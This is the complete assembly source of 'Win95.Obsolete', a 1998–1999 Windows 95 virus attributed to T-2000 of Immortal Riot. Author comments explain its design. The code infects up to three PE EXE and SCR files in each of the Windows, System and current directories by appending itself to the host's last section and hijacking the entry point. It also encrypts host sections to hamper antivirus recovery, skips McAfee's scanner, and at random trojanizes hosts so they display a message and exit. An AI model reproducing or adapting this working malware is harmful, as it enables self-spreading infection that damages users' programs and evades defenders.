;============================================================================ ; ; ; NAME: Win95.Obsolete v1.00 ; TYPE: Direct-action variable encrypting PE-infector. ; OS: Windoze95 (my version that is). ; SIZE: 1400-sumptin' bytes (yuck!). ; AUTHOR: T-2000 / [Immortal Riot]. ; E-MAIL: T2000_@hotmail.com ; DATE: December 1998 - February 1999. ; PAYLOAD: Trojanizes files. ; ; ; Driven by the painful thought that my virii would never make the rounds ; again, I had to abandon my soulmate DOS and start writing for the Win32- ; beast... may the Incubus get me... ; ; Obsolete is a 32-bit virus specifically written for Windoze95, however, ; it may or may not work correctly under other Win95-releases than mine, ; this due the fact that it uses two static API's (namely GetModuleHandleA ; and GetProcAddressA). When an infected file is executed the virus will ; try to infect up to three PE EXE/SCR files in the Windoze, System, and ; current directory. Files starting with the DWORD 'SCAN' will be excluded ; from infection, I assume McFuck's Win95-SCAN does a sanity-check, though ; I haven't verified this. Filedates/times will be preserved during the ; infection-process, and the virus won't be bothered by readonly-attributes. ; Obsolete doesn't fix a PE's alignments, Win95 doesn't give a fuck while ; WinNT does. Infection is achieved by adding the virusbody to the end of ; the victim's last section and pointing Entrypoint_RVA to this position. ; PE's are physically cut-off after the virusbody, this means that infected ; files can both grow or shrink in size. To make this heap of API's a bit ; less trivial I made it variable encrypt the last section of the host-file, ; it should harden-up recovery for the AV-pigs. Besides the virus itself is ; also variable encrypted with a seperate key. The payload is rather "harm- ; less" from my point of view, every now & then it trojanizes the file it is ; infecting, trojanized files will generate a soundblaster beep, display an ; OK-box with a message, and then exit the current process, they won't pass ; control back to their host anymore, but are still cleanable. ; ; Now why is it that almost everybody is infecting PE's by adding to the ; last section? (being called the "29A-technique" by a certain group of ; braggers). For instance, you are changing the section's flags, in Windoze ; you should always stay the fuck off things that ain't yours. Furthermore, ; when you overwrite the (supposed to be) zero padding-bytes with your virus, ; you might just as well overwrite overlay-data, and what if you decide to ; stay resident in the "stolen" section? it is very likely that the section's ; virtualsize will overlap with your virus, and thus crash the system. ; ; ; CREDITS: ; ; Thanks to Lord Julus for writing that PE-infection guide which showed me ; the basics of Win32-programming, further more JFK's One was of much help ; as it was well commented, yet not too complicated. Biggest thanks go to ; Virogen and Murkry for teaching me the steps of how to infect a PE-file. ; Unfortunately Johnny Panic's info was a bit too advanched for me to ; understand as for now, and TechnoDrunk's advice was as usual hidden ; between a large amount of polymorphic junk-comments. Much information was ; gathered from the excellent PE-essays written by Micheal J. O'Leary and ; B. Luevelsmeyer (though the last one mentioned contained some errors). ; ; As this is my 1st Win32-virus, errors are very likely to exist in this ; source, if you do find any of them, and/or have any advice for me regarding ; Win32-coding, please do inform me about it. ; ; P.S. First generations will crash on exit. ; ; P.P.S. How the fuck do I smash sectors in Win32 ? ; ;============================================================================ ORG 0 .386p .MODEL FLAT .DATA DD 0 ; Uch, without this the file will ; crash, don't ask me why... EXTRN CreateThreadA:PROC ; GetProcAddress seems to need these. EXTRN MessageBoxIndirectA:PROC .CODE Off = 0 On = 1 Debug_Mode = On ; If switched on, only DUM*.* ; will be infected. Files_Per_Dir EQU 3 ; 3 files per directory. Marker_File EQU 'T2IR' ; Creeping through ur files. Virus_Size EQU (Virus_End-START) ; Physical virussize. Virus_Size_Mem EQU (Virus_End_Mem-START) ; Virtual virussize. START: PUSHFD ; Save flags & registers. PUSHAD CALL Get_Delta ; Get our position in memory. Get_Delta: POP ESI SUB ESI, (Get_Delta-START) MOV AL, 0 ; Load initial virus-key. Initial_Key = BYTE PTR $-1 MOV EBX, (Encrypted-START) MOV ECX, (Virus_End-Encrypted) Decrypt_Byte: XOR [ESI+EBX], AL ; Decrypt a byte. INC EBX ; Next one please. ADD AL, 0 ; X-Ray, away. Sliding_Key = BYTE PTR $-1 LOOP Decrypt_Byte ; And repeat the process. Encrypted: ; All that comes after this is kept encrypted in PE's. ; Get image-base, this method should also work ; if the image is loaded at a different base ; than the one specified in the PE-header. MOV EAX, ESI SUB EAX, 12345678h Virus_RVA = DWORD PTR $-4 MOV [ESI+(Host_Image_Base-START)], EAX ADD [ESI+(Old_EIP-START)], EAX MOV EAX, (KERNEL32_API-START) LEA EDI, [ESI+(K32_API_Addresses-START)] CALL Retrieve_API JECXZ JMP_Exec_Host JMP Begin_Search Payload_Switch = BYTE PTR $-1 Trojan: ; Trojanized files will continue execution here. ; Retrieve API-addresses in USER32.DLL. MOV EAX, (USER32_API-START) CALL Retrieve_API JECXZ JMP_Exec_Host ; Generate a soundblaster-beep. PUSH MB_ICONEXCLAMATION CALL [ESI+(MessageBeep-START)] ; Display a box with a message. PUSH MB_ICONEXCLAMATION LEA EAX, [ESI+(Window_Name-START)] PUSH EAX LEA EAX, [ESI+(Payload_Msg-START)] PUSH EAX PUSH 0 CALL [ESI+(MessageBoxA-START)] ; Exit current process. CALL [ESI+(ExitProcess-START)] Window_Name DB 'Win95.Obsolete v1.00', 0 Payload_Msg DB 'MAN HAS BECOME OBSOLETE... FEAR THE MACHINES!', 0 JMP_Exec_Host: JMP Execute_Host Begin_Search: LEA EBX, [ESI+(Current_Directory-START)] MOV ECX, MAX_PATH PUSH EBX ; Save original path. PUSH EBX PUSH ECX CALL [ESI+(GetCurrentDirectoryA-START)] ; Obtain path to Windoze-directory. ADD EBX, ECX PUSH EBX PUSH ECX PUSH EBX CALL [ESI+(GetWindowsDirectoryA-START)] ; Obtain path to Windoze\System-directory. ADD EBX, ECX PUSH EBX PUSH ECX PUSH EBX CALL [ESI+(GetSystemDirectoryA-START)] ; Infect files in Windoze-directory. MOV EBX, [ESI+(SetCurrentDirectoryA-START)] CALL EBX CALL Infect_Directory ; Infect files in Windoze\System-directory. CALL EBX CALL Infect_Directory ; Infect files in the current directory. CALL EBX CALL Infect_Directory Execute_Host: MOV ECX, 0 Section_Size = DWORD PTR $-4 JECXZ Virus_Exit MOV EBX, 400000h Host_Image_Base = DWORD PTR $-4 ADD EBX, OFFSET Carrier RVA_Encrypted = DWORD PTR $-4 MOV AL, 0 Init_K_Section = BYTE PTR $-1 Decr_Section: XOR [EBX], AL ; Decrypt the host's section. INC EBX ADD AL, 0 Slide_K_Section = BYTE PTR $-1 LOOP Decr_Section Virus_Exit: POPAD ; Restore registers & flags. POPFD MOV EAX, OFFSET Carrier ; EAX = EIP of program. Old_EIP = DWORD PTR $-4 JMP EAX Infect_Directory: PUSHAD ; Reset infection-counter. AND BYTE PTR [ESI+(Infect_Counter-START)], 0 LEA EAX, [ESI+(Search_Buffer-START)] PUSH EAX LEA EAX, [ESI+(File_Spec-START)] PUSH EAX CALL [ESI+(FindFirstFileA-START)] CMP EAX, -1 ; Abort on error. JE Exit_Infect XCHG EBP, EAX Infect_Loop: CMP BYTE PTR [ESI+(Infect_Counter-START)], Files_Per_Dir JNB Exit_Infect Infect_File: PUSH EBP LEA EBX, [ESI+(Search_Buffer.Find_File_Name-START)] Check_File_Ext: MOV EDI, EBX XOR AL, AL ; Find end of ASCIIZ-string. MOV CH, 0FFh CLD REPNZ SCASB MOV EAX, [EDI-5] ; Get last DWORD of filename. CALL Upcase_EAX CMP EAX, 'EXE.' ; Standard .EXE-file? JE Check_Filename Go_Find_Next_F: CMP EAX, 'RCS.' ; Screensaver-file? JNE Find_Next_File Check_Filename: MOV EAX, [EBX] ; Get 1st DWORD of filename. CALL Upcase_EAX CMP EAX, 'NACS' ; Don't infect McFuck SCAN, JE Go_Find_Next_F ; (most overused Windoze AV). Save_File_Attr: PUSH EBX CALL [ESI+(GetFileAttributesA-START)] PUSH EAX PUSH EBX ; Clear the readonly-flag. AND AL, NOT FILE_ATTRIBUTE_READONLY PUSH EAX PUSH EBX CALL [ESI+(SetFileAttributesA-START)] XOR EBP, EBP PUSH EBP ; Open the file. PUSH FILE_ATTRIBUTE_NORMAL PUSH OPEN_EXISTING PUSH EBP PUSH EBP PUSH GENERIC_READ OR GENERIC_WRITE PUSH EBX CALL [ESI+(CreateFileA-START)] CMP EAX, -1 ; Error? JE Restore_Attr MOV [ESI+(File_Handle-START)], EAX PUSH EAX XCHG EDI, EAX ; Save the host's time/date of creation, ; last access, and last write. LEA EAX, [ESI+(Victim_Last_Write_Time-START)] PUSH EAX PUSH EAX ADD EAX, 8 PUSH EAX ADD EAX, 8 PUSH EAX PUSH EDI CALL [ESI+(GetFileTime-START)] PUSH EBP PUSH EDI CALL [ESI+(GetFileSize-START)] MOV [ESI+(Host_Size-START)], EAX ADD EAX, Virus_Size ; Like, allocate memory for the mapped file, or ; whatever the fuck this shit is neccesary for. PUSH EBP PUSH EAX PUSH EBP PUSH PAGE_READWRITE PUSH EBP PUSH EDI CALL [ESI+(CreateFileMappingA-START)] OR EAX, EAX ; Error? JZ Close_File PUSH EAX ; This should map the file in our ; allocated memory, am I not right??? PUSH EBP ; WHOLE file. PUSH EBP PUSH EBP PUSH FILE_MAP_WRITE PUSH EAX CALL [ESI+(MapViewOfFile-START)] OR EAX, EAX ; Error? JZ Close_Mapping PUSH EAX CMP [EAX.EXE_Mark], 'ZM' ; File must be .EXE-type. JNE Unmap_File CMP [EAX.Reloc_Table], 40h ; It has a NE/PE-header? JB Unmap_File MOV ECX, [EAX+3Ch] ; Obtain pointer to PE-header. LEA EDI, [EAX+ECX] ; EDI = PE-header. CMP [EDI.PE_Mark], 'EP' ; Make sure it's a PE-file. JNE Unmap_File ; A bit redundant, I guess... CMP [EDI.CPU_Type], 14Ch ; This PE is for 386+'s ? JNE Unmap_File ; === Avoid DLL's. === TEST BYTE PTR [EDI.PE_Flags+1], 00100000b JNZ Unmap_File ; === Did we already infect it before? === CMP [EDI.Reserved_1], Marker_File JE Unmap_File XCHG EBX, EAX ; EBX = Mapping-address. ; === Get last section-header. === XOR EAX, EAX MOV AX, [EDI.Number_Of_Sections] DEC AX MOV ECX, 40 MUL ECX MOV EDX, EDI ; EDX = PE-header. MOV BP, [EDX.Headers_Size] ADD EBP, 18h ADD EBP, EAX ADD EBP, EDX ; EBP = Last section-header. MOV EAX, [EBP.Section_Start] ADD EAX, [EBP.Section_Size_Raw] LEA EDI, [EAX+EBX] ; Offset of virus in file. PUSHAD MOV ECX, Virus_Size ; Copy virus to mapped file. CLD REP MOVSB POPAD ADD EAX, Virus_Size ; Set new size of host. MOV [ESI+(Host_Size-START)], EAX PUSH [EDX.Entry_Point] POP DWORD PTR [EDI+(Old_EIP-START)] ; Calculate virus' new EIP RVA. MOV EAX, [EBP.Section_RVA] ADD EAX, [EBP.Section_Size_Raw] MOV [EDX.Entry_Point], EAX ; Set our new entrypoint. MOV [EDI+(Virus_RVA-START)], EAX IN AX, 40h ; Get a random value in AL. XOR AL, AH AND AL, 11111100b ; Trojanize this victim? JNZ Skip_Trojanize ; Patch JMP to let it point to the trojan-code. MOV [EDI+(Payload_Switch-START)], AL Skip_Trojanize: MOV EAX, [EBP.Section_Size_Raw] MOV ECX, [EBP.Section_Size_Virtual] ; Always pick the smallest size. CMP EAX, ECX ; The other one is smaller? JNB Not_Bigger ; No, leave things this way. XCHG ECX, EAX ; Else use the smaller size. Not_Bigger: MOV [EDI+(Section_Size-START)], ECX ADD [EBP.Section_Size_Virtual], Virus_Size_Mem ADD [EBP.Section_Size_Raw], Virus_Size ADD [EDX.Image_Size], Virus_Size ; Set object-flags: code, executable, readable, and writable. OR [EBP.Section_Flags], 11100000000000000000000000100000b JECXZ Encrypt_Virus ; Don't let LOOP overflow. ADD EBX, [EBP.Section_Start] PUSH [EBP.Section_RVA] POP DWORD PTR [EDI+(RVA_Encrypted-START)] IN AX, 40h ; Get random keys. MOV [EDI+(Init_K_Section-START)], AL MOV [EDI+(Slide_K_Section-START)], AH Encr_Section: XOR [EBX], AL ; Encrypt host's last section. INC EBX ADD AL, AH LOOP Encr_Section Encrypt_Virus: IN AX, 40h ; Get a random value in AX. MOV [EDI+(Initial_Key-START)], AL MOV [EDI+(Sliding_Key-START)], AH ADD EDI, (Encrypted-START) MOV ECX, (Virus_End-Encrypted) Encrypt_Byte: XOR [EDI], AL ; Encrypt virusbody. INC EDI ADD AL, AH LOOP Encrypt_Byte ; Mark this host as being infected. MOV [EDX.Reserved_1], Marker_File ; We succesfully infected yet another file. INC BYTE PTR [ESI+(Infect_Counter-START)] Unmap_File: CALL [ESI+(UnmapViewOfFile-START)] Close_Mapping: CALL [ESI+(CloseHandle-START)] Close_File: PUSH 0 PUSH 0 PUSH 12345678h Host_Size = DWORD PTR $-4 PUSH DWORD PTR [ESI+(File_Handle-START)] CALL [ESI+(SetFilePointer-START)] PUSH DWORD PTR [ESI+(File_Handle-START)] CALL [ESI+(SetEndOfFile-START)] POP EAX PUSH EAX ; Restore original filedates ADD EAX, 8 ; and times. PUSH EAX ADD EAX, 8 PUSH EAX PUSH 12345678h File_Handle = DWORD PTR $-4 CALL [ESI+(SetFileTime-START)] CALL [ESI+(CloseHandle-START)] Restore_Attr: CALL [ESI+(SetFileAttributesA-START)] Find_Next_File: POP EBP ; Now go find the next .EXE-file. LEA EAX, [ESI+(Search_Buffer-START)] PUSH EAX PUSH EBP CALL [ESI+(FindNextFileA-START)] OR EAX, EAX JNZ Infect_Loop Exit_Infect: POPAD RET Author DB '(c) 1998-1999 by T-2000 / Immortal Riot', 0 ; EAX = Offset to module-name. ; EDI = Pointer to buffer API-addresses. Retrieve_API: PUSH ESI MOV EBX, ESI ; EBX holds the delta-offset. ADD ESI, EAX ; Module-name. ; === Get the base-address of the given module. === PUSH ESI CALL [EBX+(GetModuleHandleA-START)] XCHG ECX, EAX JECXZ Exit_Get_API MOV EBP, ECX ; EBP = Module-base. ADD ESI, 13 ; ESI = Start API-names. Retrieve_Addr: PUSH ESI ; Retrieve the API's address. PUSH EBP CALL [EBX+(GetProcAddress-START)] CLD ; Store the API-address. STOSD XCHG ECX, EAX JECXZ Exit_Get_API Find_End_API: LODSB ; Go to next API-name. OR AL, AL ; Reached the end of ASCIIZ? JNZ Find_End_API CMP [ESI], AL ; We did 'em all? JNZ Retrieve_Addr ; Nope, so continue loop. Exit_Get_API: POP ESI RET ; Don't use a lame AND to convert to uppercase, it'll ; screw things up with non-alfabethical characters. Upcase_EAX: ROL EAX, 8 CALL Upcase_AL ROL EAX, 8 CALL Upcase_AL ROL EAX, 8 CALL Upcase_AL ROL EAX, 8 Upcase_AL: CMP AL, 'a' JB Exit_Upcase_AL CMP AL, 'z' JA Exit_Upcase_AL SUB AL, 'a' - 'A' Exit_Upcase_AL: RET ; ********************* DATA AREA ******************************************* IF Debug_Mode File_Spec DB 'DUM*.*', 0 ; Searchmask for debugmode. ELSE File_Spec DB '*.*', 0 ; Searchmask for wildmode. ENDIF ; All API's used by the actual infection-process. KERNEL32_API DB 'KERNEL32.dll', 0 DB 'GetWindowsDirectoryA', 0 DB 'GetSystemDirectoryA', 0 DB 'FindFirstFileA', 0 DB 'FindNextFileA', 0 DB 'CreateFileA', 0 DB 'CreateFileMappingA', 0 DB 'MapViewOfFile', 0 DB 'UnmapViewOfFile', 0 DB 'CloseHandle', 0 DB 'GetFileTime', 0 DB 'SetFileTime', 0 DB 'GetFileSize', 0 DB 'SetFilePointer', 0 DB 'SetEndOfFile', 0 DB 'GetCurrentDirectoryA', 0 DB 'SetCurrentDirectoryA', 0 DB 'GetFileAttributesA', 0 DB 'SetFileAttributesA', 0 DB 'ExitProcess', 0 DB 0 ; This shit is only used by the trojan-code. USER32_API DB 'USER32.dll', 0, 0, 0 DB 'MessageBoxA', 0 DB 'MessageBeep', 0 DB 0 ; Fuck, these are hardcoded! GetModuleHandleA DD 0BFF775BDh GetProcAddress DD 0BFF76D5Ch Virus_End: K32_API_Addresses: GetWindowsDirectoryA DD 0 GetSystemDirectoryA DD 0 FindFirstFileA DD 0 FindNextFileA DD 0 CreateFileA DD 0 CreateFileMappingA DD 0 MapViewOfFile DD 0 UnmapViewOfFile DD 0 CloseHandle DD 0 GetFileTime DD 0 SetFileTime DD 0 GetFileSize DD 0 SetFilePointer DD 0 SetEndOfFile DD 0 GetCurrentDirectoryA DD 0 SetCurrentDirectoryA DD 0 GetFileAttributesA DD 0 SetFileAttributesA DD 0 ExitProcess DD 0 U32_API_Addresses: MessageBoxA DD 0 MessageBeep DD 0 Current_Directory DB MAX_PATH DUP(0) Windows_Directory DB MAX_PATH DUP(0) System_Directory DB MAX_PATH DUP(0) Infect_Counter DB 0 Victim_Last_Write_Time DD 0, 0 Victim_Last_Access_Time DD 0, 0 Victim_Creation_Time DD 0, 0 Search_Buffer DB 666 DUP(0) Virus_End_Mem: ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Section_Header STRUC Section_Name DB 8 DUP(0) Section_Size_Virtual DD 0 Section_RVA DD 0 Section_Size_Raw DD 0 Section_Start DD 0 DD 0, 0 DW 0, 0 Section_Flags DD 0 Section_Header ENDS Find_First_Next_Win32 STRUC File_Attributes DD 0 Creation_Time DD 0, 0 Last_Accessed_Time DD 0, 0 Last_Written_Time DD 0, 0 Find_File_Size_High DD 0 Find_File_Size_Low DD 0 Find_Reserved_1 DD 0 Find_Reserved_2 DD 0 Find_File_Name DB 260 DUP(0) Find_DOS_File_Name DB 13 DUP(0) Find_First_Next_Win32 ENDS EXE_Header STRUC EXE_Mark DW 0 ; Marker valid .EXE-file: MZ or ZM. Image_Mod_512 DW 0 Image_512_Pages DW 0 Reloc_Items DW 0 Header_Size_Mem DW 0 Min_Size_Mem DW 0 Max_Size_Mem DW 0 Program_SS DW 0 Program_SP DW 0 Checksum DW 0 Program_IP DW 0 Program_CS DW 0 Reloc_Table DW 0 EXE_Header ENDS PE_Header STRUC PE_Mark DD 0 ; PE-marker (PE/0/0). CPU_Type DW 0 Number_Of_Sections DW 0 DD 0 Reserved_1 DD 0 DD 0 Headers_Size DW 0 PE_Flags DW 0 DW 8 DUP(0) Entry_Point DD 0 DD 2 DUP(0) Image_Base DD 0 Object_Align DD 0 File_Align DD 0 DW 0, 0 DW 0, 0 DW 0, 0 DD 0 Image_Size DD 0 PE_Header ENDS ; This shit ain't complete. INCLUDE WIN32API.INC Carrier: PUSH 0 CALL ExitProcess END START